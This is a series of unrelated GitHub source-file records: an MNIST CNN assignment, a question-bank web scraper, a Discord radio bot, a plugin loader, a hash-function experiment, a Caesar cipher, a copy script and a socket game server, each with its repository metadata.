\n# \n# * What does the line ```X = X.reshape(X.shape[0], 28, 28, 1)``` do?\n# \n# This operation reshapes the flattened array into a new array with (rows, height, width, colour_channel)\n# \n# \n# Look at how the encoding of the targets (i.e. ```y```) is changed. E.g. 
the lines\n# ```\n# y_oh = np.zeros((num_tot, num_classes))\n# y_oh[range(num_tot), y] = 1\n# ```\n# Print out a few rows of ```y``` next to ```y_oh```.\n# * What is the relationship between ```y``` and ```y_oh```?\n# \n# \n# \"y\" is the supervised information that tells you which output class a given input belongs to\n# \"y\" ranges from 0 to 9 while y_oh is the one-hot encoding.\n# \n# \n# \n# * What is the type of encoding in ```y_oh``` called and why is it used?\n# \n# \n# y_oh is the one-hot encoding and it's used for classification problems.\n# Since deep learning is based on math and numbers, \n# the output of a classification must be a numerical value and not a string. \n# Therefore a multiclass problem should be one-hot encoded \n# so that the output of the neural network can be numerically compared with the prediction.\n# \n# Ex: A NN with three classes (\"dog,cat,human\") should have 3 columns one for dog, one for cat and another for human\n# a dog picture would have its one hot encoding (1 , 0 , 0) because it belongs to one class \n# a cat picture would have its one hot encoding (0 , 1 , 0) and a human would have (0, 0, 1)\n# \n# \n# \n# * Plot three data examples in the same figure and set the correct label as title. \n# * It should be possible to see what the data represent.\n\n# %%\n# ### Question 2\n# **The model**\n# \n# Below is some code for building and training a model with Keras.\n# * What type of network is implemented below? I.e. a normal MLP, RNN, CNN, Logistic Regression...?\n# The type of the network used is CNN (Convolutional Neural Network) \n# * What does ```Dropout()``` do?\n# \"Dropout randomly disconnects neuron connections to make the CNN more generalist, \n# and thus reducing the probability of overfitting\" \n# * Which type of activation function is used for the hidden layers?\n# Rectified Linear Unit (ReLU) \n# * Which type of activation function is used for the output layer?\n# Softmax \n# * Why are two different activation functions used?\n# ReLU is used to solve the vanishing gradient problem \n#\t\t\t\t\t\t\t and it reduces the influence of negative values after a convolution,\n# while softmax is used to transform the output layer probabilities\n# into the most probable output \n# * What optimizer is used in the model below?\n# Although the name of the function is SGD (Stochastic Gradient Descent)\n# \t\t\t\t\t\tthe model uses mini-batch gradient descent \n# * How often are the weights updated (i.e. after how many data examples)?\n# The epochs and batches define when the weights are updated. \n# \t\t\t\t\t\t\tSince this specific model is using mini-batch gradient descent,\n# \t\t\t\t\t\t\tthe model will update its weights after completing a batch.\n# \t\t\t\t\t\t\tA dataset with 800 images and a batch size of 32 \n# \t\t\t\t\t\t\twill have 25 weight updates per epoch. \n# * What loss function is used?\n# \n# Categorical crossentropy \n# \n# \n# * How many parameters (i.e. weights and biases, NOT hyper-parameters) does the model have?\n# \n# <*answer here*> \n# \n#from IPython import embed; embed()\n\n# %%\n# ### Question 3\n# \n# * **Visualize the training**. Use the model above to observe the training process. Train it for 150 epochs and then plot both \"loss\" and \"val_loss\" (i.e. loss on the validation set, here the terms \"validation set\" and \"test set\" are used interchangeably, but this is not always true). What is the optimal number of epochs for minimizing the test set loss? 
\n# * Remember to first reset the weights (```model.reset_states()```), otherwise the training just continues from where it was stopped earlier.\n# \n# * **Optimizer**. Select three different optimizers and for each find the close-to-optimal hyper-parameter(s). In your answer, include a) your three choices, b) best hyper-parameters for each of the three optimizers and, c) the code that produced the results.\n# * NOTE that how long the training takes varies with optimizer. I.e., make sure that the model is trained for long enough to reach optimal performance.\n# \n# * **Dropout**. Use the best optimizer and do a hyper-parameter search to find the best value for ```Dropout()```.\n# \n# * **Best model**. Combine what you learned from the above three questions to build the best model. How much better is it than the worst and average models?\n# \n# <*answer here*> \n# \n# \n# * **Results on the test set**. When doing this search for good model configuration/hyper-parameter values, the data set was split into *two* parts: a training set and a test set (the term \"validation\" was used interchangeably with \"test\"). For your final model, is the performance (i.e. accuracy) on the test set representative for the performance one would expect on a previously unseen data set (drawn from the same distribution)? Why?\n# \n# <*answer here*> \n# \n# \n# ## Further information\n# For ideas about hyper-parameter tuning, take a look at the strategies described in the sklearn documentation under [model selection](https://scikit-learn.org/stable/model_selection.html), or in this [blog post](https://blog.tensorflow.org/2020/01/hyperparameter-tuning-with-keras-tuner.html) from TensorFlow. For a more thorough discussion about optimizers see [this video](https://www.youtube.com/watch?v=DiNzQP7kK-s) discussing the article [Descending through a Crowded Valley -- Benchmarking Deep Learning Optimizers](https://arxiv.org/abs/2007.01547).\n# \n# \n# **Good luck!**\n\n\n# %%\n","repo_name":"ricardoluhms/cnn_mnist_gen_alg","sub_path":"tutorial_mmai_assignment_3_v2.py","file_name":"tutorial_mmai_assignment_3_v2.py","file_ext":"py","file_size_in_byte":26398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} {"seq_id":"30911974194","text":"# -*- coding: utf-8 -*-\n\nimport requests\n\nfrom achihuo_mini.async_loop import AsyncLoop\nfrom achihuo_mini.item import Item\nfrom vko_spider.mini_spider.vko_mini_spider import VkoMiniSpider\n\nHEADERS = {\n'Accept-Encoding': 'gzip, deflate',\n'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4',\n'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.87 Safari/537.36',\n'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n'Accept': '*/*',\n'X-Requested-With': 'XMLHttpRequest',\n'Connection': 'keep-alive',\n'Referer': 'http://tiku.vko.cn/',\n}\n\nURL = 'http://tiku.vko.cn/resolve/{}'\n\nclass VkoMiniSpider(AsyncLoop):\n\n    NAME = 'vko_mini_spider'\n\n    def __init__(self):\n        super(VkoMiniSpider, self).__init__(concurrency=30, cache_backend='ssdb')\n\n\ndef make_item(qid):\n    url = URL.format(qid)\n    item = Item(dict(\n        method = 'GET',\n        url = url,\n        max_retry = 2,\n        timeout = 60,\n    ))\n    return item\n\n\ndef request(qid):\n    url = URL.format(qid)\n    resp = requests.get(url, headers=HEADERS)\n    return resp.text\n\n\ndef find_max_qid():\n    min_qid = 1\n    max_qid = 1000000\n\n    def binary_search(mnq, mxq):\n        if mxq - mnq <= 1:\n            return mxq\n\n        mid = (mxq + mnq) // 2\n        
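# probe the midpoint: judging by the check below, a body wrapped in 'null('\n        # means the qid still exists (search up), anything else means mid is past\n        # the end (search down)\n        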
print(mid)\n html = request(mid)\n if not html.startswith('null('):\n return binary_search(mnq, mid)\n else:\n return binary_search(mid, mxq)\n\n return binary_search(min_qid, max_qid)\n\n\ndef main():\n loop = VkoMiniSpider()\n\n max_qid = find_max_qid()\n for qid in range(1, max_qid):\n item = make_item(qid)\n loop.add_task('get_question', item, task_name=item.url, repeat=False)\n\n\ndef test():\n max_qid = find_max_qid()\n print('max_qid', max_qid)\n\n\nif __name__ == '__main__':\n main()\n # test()\n","repo_name":"waryhao/Afanti_tiku","sub_path":"vko_spider/mini_spider/vko_add_next_qids.py","file_name":"vko_add_next_qids.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13404711758","text":"import json\nimport array\nimport struct\nimport audioop\nimport discord\nimport asyncio\nimport requests\nimport threading\nfrom io import BufferedIOBase, BytesIO\nfrom queue import Queue, Empty as EmptyQueue\nfrom typing import *\nfrom subprocess import Popen, PIPE\nfrom functools import partial\nfrom discord.ext import commands, tasks\nfrom discord.ext.commands import CommandError\n\n\nclass OggVorbisStream:\n\n def __init__(self, file_handle: BufferedIOBase) -> None:\n self.page_iter = self.page_generator(file_handle)\n\n def page_generator(self, file_handle: BufferedIOBase):\n while file_handle.read(4) == b\"OggS\":\n yield OggPage(file_handle)\n\n def get_next_page(self):\n try:\n return next(self.page_iter)\n except StopIteration:\n return None\n\n\nclass OggPage:\n\n ogg_page_struct = struct.Struct(\"=BBQIIIB\")\n\n def __init__(self, file_handle: BufferedIOBase) -> None:\n self.version, self.mode, self.granule, self.serial, self.page_no, self.crc, self.len_seg_table = self.ogg_page_struct.unpack(\n file_handle.read(self.ogg_page_struct.size))\n\n self.seg_table = array.array('B', struct.unpack(\n 'B'*self.len_seg_table, file_handle.read(self.len_seg_table)))\n\n self.data = file_handle.read(sum(self.seg_table))\n\n def convert_to_bytes(self):\n return b\"OggS\" + self.ogg_page_struct.pack(self.version, self.mode, self.granule, self.serial, self.page_no, self.crc, self.len_seg_table) + self.seg_table.tobytes() + self.data\n\n\nclass RadioPlayer(discord.AudioSource):\n \"\"\"The radio player class\"\"\"\n\n def __init__(self, radio_code_name: str, radio_name: str, radio_url: str, radio_format: str, discord_ctx: commands.Context):\n self.radio_code_name = radio_code_name\n self.radio_name = radio_name\n self.radio_url = radio_url\n self.radio_format = radio_format\n\n self.discord_ctx = discord_ctx\n self.event_loop: asyncio.AbstractEventLoop = discord_ctx.bot.loop\n self.last_now_playing_message: discord.Message = None\n\n self._volume = 0.07\n self.audio_queue = Queue()\n\n if self.radio_format == \"direct\":\n ffmpeg_command_line = \"ffmpeg -i {url} -f s16le -ac 2 -ar 48000 pipe:1\".format(\n url=radio_url).split()\n\n self.ffmpeg_process = Popen(\n ffmpeg_command_line, stdout=PIPE, creationflags=0x08000000)\n else:\n ffmpeg_command_line = \"ffmpeg -i pipe:0 -f s16le -ac 2 -ar 48000 pipe:1\".split()\n\n self.ffmpeg_process = Popen(\n ffmpeg_command_line, stdin=PIPE, stdout=PIPE, creationflags=0x08000000)\n # the creationflags part is only if this is running in Windows\n\n # Threading!\n stdin_thread = threading.Thread(\n target=self.stdin_blaster, daemon=True)\n stdin_thread.start()\n stdout_thread = threading.Thread(target=self.drain_stdout, daemon=True)\n stdout_thread.start()\n\n 
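# pipeline summary: stdin_blaster feeds the raw radio stream into ffmpeg while\n        # drain_stdout moves decoded PCM into audio_queue in 3840-byte chunks\n        # (48000 Hz * 2 channels * 2 bytes * 20 ms = 3840 bytes, one voice frame)\n        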
self.setup_auto_disconnect()\n\n def drain_stdout(self):\n stdout: IO = self.ffmpeg_process.stdout\n while True:\n data = stdout.read(3840)\n if not data:\n break\n try:\n self.audio_queue.put(data)\n except AttributeError:\n return\n\n def stdin_blaster(self):\n stdin: IO = self.ffmpeg_process.stdin\n if self.radio_format != \"vorbis\":\n headers = {\"Icy-MetaData\": \"1\"}\n with requests.get(self.radio_url, headers=headers, stream=True) as response:\n response.raise_for_status()\n\n metaint: int = int(response.headers.get(\"icy-metaint\"))\n try:\n data = response.raw.read(metaint)\n while True:\n stdin.write(data)\n\n metadata_block_size = int.from_bytes(\n response.raw.read(1), byteorder=\"little\")\n if metadata_block_size != 0:\n metadata_bytes: bytes = response.raw.read(\n metadata_block_size * 16)\n self.event_loop.create_task(\n self.tell_text_channel_currently_playing(metadata_bytes.decode(\"utf-8\")))\n\n data = response.raw.read(metaint)\n except OSError:\n # ffmpeg closed\n return\n else:\n with requests.get(self.radio_url, stream=True) as response:\n response.raise_for_status()\n\n ogg_stream = OggVorbisStream(response.raw)\n\n page = ogg_stream.get_next_page()\n\n while page:\n if page.data[:7] == b\"\\x03vorbis\":\n metadata = dict()\n\n data_io = BytesIO(page.data)\n\n data_io.read(7)\n\n data_io.read(int.from_bytes(\n data_io.read(4), \"little\", signed=False))\n\n for _ in range(int.from_bytes(data_io.read(4), \"little\", signed=False)):\n separated_metadata = data_io.read(int.from_bytes(\n data_io.read(4), \"little\", signed=False)).decode().split('=')\n metadata[separated_metadata[0].lower()] = \"=\".join(\n separated_metadata[1:])\n\n del data_io\n\n self.event_loop.create_task(self.tell_np_vorbis(metadata))\n\n del metadata\n\n try:\n stdin.write(page.convert_to_bytes())\n except OSError:\n return\n\n page = ogg_stream.get_next_page()\n\n async def tell_np_vorbis(self, metadata: Dict):\n if self.last_now_playing_message:\n await self.last_now_playing_message.delete()\n self.last_now_playing_message = await self.discord_ctx.send(f\"Now playing {metadata['artist']} - {metadata['title']} from {self.radio_name}\")\n\n @property\n def volume(self):\n return self._volume\n\n @volume.setter\n def volume(self, value: float):\n self._volume = min(1.0, value)\n\n def get_current_song_title(self, metadata_string: str):\n \"\"\"Temp func until able to tell what is playing in the text channel\"\"\"\n metadatas = metadata_string.split(\";\")\n for metadata_line in metadatas:\n metadata_line_pair = metadata_line.split(\"=\")\n if metadata_line_pair[0] == \"StreamTitle\":\n # print(\"Currently playing {song_name} in {server_name}\".format(\n # song_name=metadata_line_pair[1].strip(\"'\"), server_name=self.discord_ctx.guild))\n # break\n return metadata_line_pair[1].strip(\"'\")\n\n async def tell_text_channel_currently_playing(self, metadata: str):\n song_name = await self.event_loop.run_in_executor(None, partial(self.get_current_song_title, metadata))\n if self.last_now_playing_message:\n await self.last_now_playing_message.delete()\n self.last_now_playing_message = await self.discord_ctx.send(f\"Now playing {song_name} from {self.radio_name}\")\n\n def setup_auto_disconnect(self):\n @tasks.loop(minutes=5, loop=self.event_loop)\n async def auto_disconnect():\n voice_client: discord.VoiceClient = self.discord_ctx.voice_client\n members: List[discord.Member] = voice_client.channel.members\n if len([member for member in members if not member.bot]) == 0:\n await 
self.discord_ctx.send(\"Disconnecting due to there is nobody in the VC\")\n voice_client.stop()\n await voice_client.disconnect()\n\n auto_disconnect.start()\n self.auto_disconnect: tasks.Loop = auto_disconnect\n\n def read(self):\n try:\n return audioop.mul(self.audio_queue.get(timeout=15), 2, self._volume)\n except EmptyQueue:\n return b''\n\n def cleanup(self):\n self.auto_disconnect.cancel()\n self.ffmpeg_process.terminate()\n\n del self.auto_disconnect\n del self.audio_queue\n del self.ffmpeg_process\n del self.last_now_playing_message\n\n del self.radio_code_name\n del self.radio_format\n del self.radio_name\n del self.radio_url\n\n\nclass Radio(commands.Cog):\n \"\"\"Radio Cog Class\"\"\"\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_ready(self):\n print(\"Radio Cog is loaded.\")\n\n @commands.command()\n async def radio(self, ctx: commands.Context, radio_code_name: str):\n \"\"\"Command to play a radio\"\"\"\n\n radio_data = await self.bot.loop.run_in_executor(None, partial(Radio.get_radio, radio_code_name))\n\n # There are always 3 element in radio_data, [0] is the url\n # [1] is the format and [2] is the radio name\n\n if not radio_data:\n return await ctx.send(f\"There is no such thing as {radio_code_name}\")\n\n player = await self.bot.loop.run_in_executor(None, partial(RadioPlayer, radio_code_name, radio_data[2], radio_data[0], radio_data[1], ctx))\n\n ctx.voice_client.play(player)\n\n @commands.command()\n async def stop_radio(self, ctx: commands.Context):\n voice_client: discord.VoiceClient = ctx.voice_client\n if voice_client.is_playing():\n voice_client.stop()\n await ctx.send(\"Stopped radio!\")\n\n @commands.command()\n async def radio_volume(self, ctx: commands.Context, volume: int):\n try:\n voice_client: discord.VoiceClient = ctx.voice_client\n voice_client.source.volume = float(volume / 100)\n except AttributeError as e:\n await ctx.send(\"Failed to change volume\")\n raise e\n await ctx.send(f\"Changed volume to {volume}\")\n\n @radio.before_invoke\n async def radio_before_invoke(self, ctx: commands.Context):\n if ctx.voice_client is None:\n if ctx.author.voice:\n await ctx.author.voice.channel.connect()\n print(\n f\"Connected to the {ctx.author}'s voice channel on {ctx.guild} server!\")\n else:\n await ctx.send(\"Please join a VC first!\")\n raise CommandError(\n f\"{ctx.author} tried to summon bot while being outside of VC.\")\n\n # This part is to check if it need to stop the current player\n # or not by checking either if it the user is asking to listen to\n # currently playing radio station or if it is not radio player at all\n elif ctx.voice_client.is_playing():\n if ctx.voice_client.source is RadioPlayer:\n radio_player: RadioPlayer = ctx.voice_client.source\n # check if currently playing station is the same\n # as the one being asked to tuned into\n # ctx.args[2] is the radio_name argument of the radio command\n if radio_player.radio_code_name == ctx.args[2]:\n await ctx.send(f\"Already tuned to {ctx.args[2]}!\")\n raise CommandError(\n f\"User {ctx.author} tried to tune into the currently tuned radio station.\")\n # if we reached here, it means that the source is either some type of other source/player\n # or its a different station, either way, we just stop them\n ctx.voice_client.stop()\n\n @commands.command(aliases=[\"radios\"])\n async def list_all_radio(self, ctx: commands.Context):\n line_format = \"{radio_name} -> {radio_code}\\n\"\n formatted_str = \"\"\n\n radios: Dict = await 
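The read() method above scales each 16-bit PCM frame with audioop.mul before handing it to Discord. A tiny standalone illustration of that call; note audioop is deprecated since Python 3.11 and removed in 3.13:

import array
import audioop  # stdlib; deprecated in 3.11, removed in 3.13

samples = array.array("h", [1000, -1000, 20000, -20000])  # 16-bit PCM samples
half = audioop.mul(samples.tobytes(), 2, 0.5)             # width=2 bytes/sample
print(array.array("h", half).tolist())  # -> [500, -500, 10000, -10000]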
self.bot.loop.run_in_executor(None, Radio.get_radios)\n\n radio_code: str\n radio_data: List[str]\n for radio_code, radio_data in radios.items():\n formatted_str += line_format.format(\n radio_name=radio_data[2], radio_code=radio_code)\n\n await ctx.send(\n \"```\\n\" +\n formatted_str +\n \"```\"\n )\n\n @staticmethod\n def get_radio(radio_name: str) -> Union[Dict, bool]:\n with open(\"data/radios.json\", 'r') as json_file:\n radios: Dict = json.load(json_file)\n\n try:\n return radios[radio_name]\n except:\n return False\n\n @staticmethod\n def get_radios():\n with open(\"data/radios.json\", 'r') as json_file:\n radios: Dict = json.load(json_file)\n\n return radios\n\n\ndef setup(bot: commands.Bot):\n bot.add_cog(Radio(bot))\n","repo_name":"Naz1337/discord-naz-bot","sub_path":"cogs/radio.py","file_name":"radio.py","file_ext":"py","file_size_in_byte":12703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32830439153","text":"from enum import Enum\nfrom Core import Node\n\n\nclass TypeOfComp(Enum):\n Res = \"Resistance\"\n Node = \"Node\"\n IndVolt = \"Independent voltage\"\n IndCur = \"Independent Current\"\n\nclass Component():\n def __init__(self, type: TypeOfComp):\n self.__voltage: int = 0\n self.__charge: int = 0\n self.__type = type\n\n @property\n def Type(self):\n return self.__type\n\ndef checkExistanceOfNode(nodeNumber, nodes: dict):\n if nodeNumber in nodes:\n node = nodes[nodeNumber]\n else:\n node = Node.Node(nodeNumber)\n nodes[nodeNumber] = node\n return node\n","repo_name":"daniyalmaroufi/circuit-solver","sub_path":"Core/Component.py","file_name":"Component.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"12274694047","text":"import glob\nimport imp\nimport os.path\n\n\nclass Plugin(object):\n \"\"\"Base class for all plugins.\"\"\"\n\n capability = []\n\n @classmethod\n def is_capable(cls, requested_capability):\n \"\"\"Returns true if the requested capability is supported by this plugin\n \"\"\"\n for c in requested_capability:\n if c not in cls.capability:\n return False\n return True\n\n\ndef get_plugin(cls, requested_capability=None):\n if not requested_capability:\n requested_capability = []\n result = []\n for handler in cls.__subclasses__():\n if handler.is_capable(requested_capability):\n result.append(handler)\n return result\n\n\ndef _import_module(filename):\n (path, name) = os.path.split(filename)\n (name, ext) = os.path.splitext(name)\n\n (file, filename, data) = imp.find_module(name, [path])\n try:\n return imp.load_module(name, file, filename, data)\n finally:\n if file:\n file.close()\n\n_plugin_loaded = False\n\n\ndef load_plugins(config):\n global _plugin_loaded\n if _plugin_loaded:\n return\n _plugin_loaded = True\n\n if not config.has_option('Plugin', 'plugin_directory'):\n return\n directory = config.get('Plugin', 'plugin_directory')\n for file in glob.glob(os.path.join(directory, '*.py')):\n _import_module(file)\n","repo_name":"silveregg/txboto","sub_path":"txboto/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"34962323512","text":"import string\nimport random\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\ndef process_word(w):\n w = w.rstrip()\n w2 = [char for char in w if char in string.ascii_letters]\n return 
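get_plugin in the txboto record walks cls.__subclasses__() and keeps the classes whose capability list covers everything requested (the imp module it uses for file loading was removed in Python 3.12; importlib.util is the modern route). A self-contained sketch of the same subclass-registry idea, with made-up plugin classes:

class Plugin:
    capability = []

    @classmethod
    def is_capable(cls, requested):
        return all(c in cls.capability for c in requested)

class S3Plugin(Plugin):
    capability = ["storage", "s3"]

class NullPlugin(Plugin):
    capability = []

def get_plugins(requested):
    # subclasses register themselves simply by being defined
    return [p for p in Plugin.__subclasses__() if p.is_capable(requested)]

print([p.__name__ for p in get_plugins(["storage"])])  # -> ['S3Plugin']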
\"\".join(w2).upper()\n\nraw_words = random.sample(open(\"/usr/share/dict/words\", \"rt\").readlines(), 100)\nwords = [pw for pw in [process_word(w) for w in raw_words] if pw]\n\n\ndef create_labelname(idx):\n w1 = random.choice(words)\n w2 = \"\" # random.choice(words)\n name = (w1+w2)[:25].upper()\n return name + \".\" + str(idx) + random.choice(string.ascii_uppercase+string.digits)\n\n\nnumber_of_labels = 5000\nlabels = [create_labelname(idx) for idx in range(number_of_labels)]\n\n\ndef hashfunc1(label):\n length = len(label) # assume we know the length of the symbol already\n c0 = ord(label[0])\n c1 = ord(label[1])\n clast = ord(label[length-1])\n return ((c0 + clast + c1*4) ^ (length*4)) & 127\n\n\ndef hashfunc2(label):\n # just sum up all the characters of the label....\n # could be faster / better if you have to scan it anyway to determine the length\n # also seems to work better for shorter labels\n length=len(label)\n return (sum([ord(c) for c in label]) ^ (length*2)) & 127\n\ndef hashfunc3(label):\n # this is the string.hash function in the prog8 string library\n hashcode = 179\n carry = 0\n for c in label:\n newcarry = 1 if hashcode&128 else 0\n hashcode = (hashcode << 1) & 255 | carry\n carry = newcarry\n hashcode ^= ord(c)\n return hashcode\n\n\nif __name__==\"__main__\":\n hash_buckets = [0] * 128\n for lbl in labels:\n hashvalue = hashfunc1(lbl)\n hash_buckets[hashvalue] += 1\n plt.subplots(figsize = (20,5))\n p=sns.barplot(x=list(range(len(hash_buckets))), y=hash_buckets)\n plt.show()\n\n hash_buckets = [0] * 128\n for lbl in labels:\n hashvalue = hashfunc2(lbl)\n hash_buckets[hashvalue] += 1\n plt.subplots(figsize = (20,5))\n sns.barplot(x=list(range(len(hash_buckets))), y=hash_buckets)\n plt.show()\n\n hash_buckets = [0] * 256\n for lbl in labels:\n hashvalue = hashfunc3(lbl)\n hash_buckets[hashvalue] += 1\n plt.subplots(figsize = (20,5))\n sns.barplot(x=list(range(len(hash_buckets))), y=hash_buckets)\n plt.show()\n","repo_name":"irmen/cx16assem","sub_path":"experiment/hashed_syms/hashfunctionstest.py","file_name":"hashfunctionstest.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"29418139191","text":"import os\r\n\r\n\r\nos.system('cls')\r\n\r\n\r\n\r\nprint('''\r\n ##################################################\r\n # #\r\n # caesar_encode by : Welson #\r\n # #\r\n ##################################################\r\n\r\n''')\r\n\r\n\r\ndef encode():\r\n print('Starting encode')\r\n print('输入你想要输入的明文' )\r\n txt = input(\">>\")\r\n print('请输入移动位数')\r\n offset = int(input(\">>\"))\r\n\r\n\r\n #考虑用户用的是字符串\r\n result = \"\"\r\n\r\n for t in txt:\r\n n = ord(t)\r\n n = n + offset\r\n t2 = chr(n)\r\n result = result + t2\r\n \r\n print(f'加密后的字符是 {result}')\r\n\r\ndef decode():\r\n print('Starting decode')\r\n print('输入你要解密的密文' )\r\n cipher = input('>>')\r\n print(\"请输入秘钥.\")\r\n key = int(input('>'))\r\n \r\n plain = \"\"\r\n\r\n \r\n for c in cipher:\r\n n = ord(c)\r\n n = n - key\r\n p = chr(n)\r\n plain += p\r\n\r\n print(f'解密后的明文是:{plain}')\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\nrunning = True\r\nwhile running:\r\n print('1.Encode 2.decode 3.Exit')\r\n sel = input(\">>\")\r\n if sel == '1':\r\n encode()\r\n elif sel == '2':\r\n decode()\r\n elif sel == '3':\r\n print(\"Thank you for use this app!\")\r\n running = False\r\n else:\r\n print('请做出正确的选择。 ')\r\n \r\n 
\r\n","repo_name":"Welsonpeaches/caeser_encode","sub_path":"caesar_encode_decode.py","file_name":"caesar_encode_decode.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13117134710","text":"import argparse\nfrom distutils.dir_util import copy_tree\n\nparser = argparse.ArgumentParser(\n description='Copy files form one folder to another',\n prog='copy_script'\n)\ndef main():\n parser.add_argument(\n '-s', \n '--source-dir', \n default=\".\",\n help=\"Source directory from where files should be copied\"\n )\n parser.add_argument(\n '-d', \n '--destination-dir', \n default=\".\", \n help=\"Source directory from where files should be copied\"\n )\n args = parser.parse_args()\n if args.source_dir == \".\" and args.destination_dir == \".\" :\n parser.print_help()\n else:\n copy_tree(args.source_dir,args.destination_dir)\n print(f\"Copied files from {args.source_dir} to {args.destination_dir}\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"HubGab-Git/copy_script","sub_path":"python/copy.py","file_name":"copy.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70454123610","text":"#server\r\n\r\nimport sys\r\nimport player\r\nimport threading\r\nimport traceback\r\nfrom socket import *\r\nimport gameserver as gs\r\nfrom random import randint\r\nimport securedsocket as ss\r\nimport configurationmanager as cm\r\n\r\nPORT = randint(0,5000) \t\t# starts from a random port\r\n\r\n\r\ndef get_new_socket(player_socket):\r\n\tglobal PORT\r\n\tPORT += 1\r\n\tport_min = cm.tcp_server_min_port\r\n\tport_max = cm.tcp_server_max_port\r\n\ttcp_port = (port_min + PORT) % port_max\r\n\r\n\ttemp_socket = socket(AF_INET, SOCK_STREAM)\r\n\ttemp_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\r\n\r\n\ttry:\r\n\t\tplayer_socket.send(str(tcp_port))\r\n\t\ttemp_socket.bind(('', tcp_port))\r\n\t\ttemp_socket.listen(15)\r\n\t\tnew_player_socket,address = temp_socket.accept()\r\n\texcept socket.timeout:\r\n\t\tprint(\"Socket timeout. Port may have been used recently. wait and try again!\")\r\n\t\treturn None,tcp_port\r\n\texcept:\r\n\t\tprint(\"Socket error. 
Try again\")\r\n\t\treturn None,tcp_port\r\n\tfinally:\r\n\t\ttemp_socket.close()\r\n\treturn ss.RSASocket(new_player_socket),address\r\n\r\n\r\n# creates a server side player_object\r\ndef prepare_player(player_socket,game_server):\r\n\tname = player_socket.recv(1024)\r\n\tnew_player_socket = None\r\n\twhile not new_player_socket:\r\n\t\tnew_player_socket,new_address = get_new_socket(player_socket)\r\n\r\n\tudp_sending = new_player_socket.recv(1024)\r\n\tnew_player_socket.send(\"ACK\")\r\n\tump_split = udp_sending[1:-1].split(\",\")\r\n\tudp_address_sending = ump_split[0][1:-1],int(ump_split[1])\r\n\r\n\tudp_receiving = new_player_socket.recv(1024)\r\n\tnew_player_socket.send(\"ACK\")\r\n\tump_split = udp_receiving[1:-1].split(\",\")\r\n\tudp_address_receiving = ump_split[0][1:-1],int(ump_split[1])\r\n\r\n\tp = player.Player(name,new_player_socket,new_address,udp_address_sending,udp_address_receiving)\r\n\r\n\tgame_server.add_player(p)\r\n\tplayer_socket.close()\r\n\r\n# to use the UDP socket\r\ndef ping_response():\r\n\tping_socket = socket(AF_INET, SOCK_DGRAM)\r\n\tping_socket.bind(('', cm.udp_ping_port)) # for pinging\r\n\twhile not server_quitting:\r\n\t\tmsg,address = ping_socket.recvfrom(1024)\r\n\t\tif (msg.decode() == \"OPEN\"):\r\n\t\t\tping_socket.sendto(msg,address)\r\n\tping_socket.close()\r\n\r\n\r\n# \r\ndef main():\r\n\tglobal server_quitting \t\t\t\t\t\t\t\t# for the future\r\n\tthreads = []\r\n\tgame_server = None\r\n\r\n\ttry:\r\n\t\tserver_quitting = False\r\n\r\n\t\t# this is to verify if the server is up (UPD)\r\n\t\tt = threading.Thread(target=ping_response)\r\n\t\tt.start()\r\n\t\tthreads.append(t)\r\n\r\n\t\tmaximum_connected = cm.maximum_connected\r\n\t\tserver_socket = socket(AF_INET,SOCK_STREAM)\r\n\t\tserver_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\r\n\t\tserver_socket.bind(('',cm.tcp_server_port)) \t\t\t\t# game socket\r\n\t\tserver_socket.listen(maximum_connected)\r\n\r\n\t\tchat_socket = socket(AF_INET, SOCK_DGRAM)\r\n\t\tchat_socket.bind(('', cm.udp_server_port))\t\t\t\t\t# chat room socket\r\n\t\tchat_socket = ss.RSASocket(chat_socket)\r\n\r\n\t\t# create the game server\r\n\t\tgame_server = gs.TheGameServer(maximum_connected,chat_socket)\r\n\t\t\r\n\t\t# entry door for incoming players\r\n\t\twhile not server_quitting:\r\n\t\t\tplayersocket, addr = server_socket.accept()\r\n\t\t\tif (not server_quitting):\r\n\t\t\t\tss_socket = ss.RSASocket(playersocket)\r\n\t\t\t\tt = threading.Thread(target=prepare_player,args=(ss_socket,game_server))\r\n\t\t\t\tt.start()\r\n\t\t\t\tthreads.append(t)\r\n\t\t\t\tprint(\"New player registered and waiting for more\")\r\n\t\t\telse: \r\n\t\t\t\t# no more connections allowed\r\n\t\t\t\tplayersocket.send(\"no more connections allowed\".encode())\r\n\t\t\t\tplayersocket.close()\r\n\texcept KeyboardInterrupt:\r\n\t\tif (game_server):\r\n\t\t\tgame_server.quit()\r\n\t\tgame_down = True\r\n\t\tprint(\"Keyboard Interrupt. 
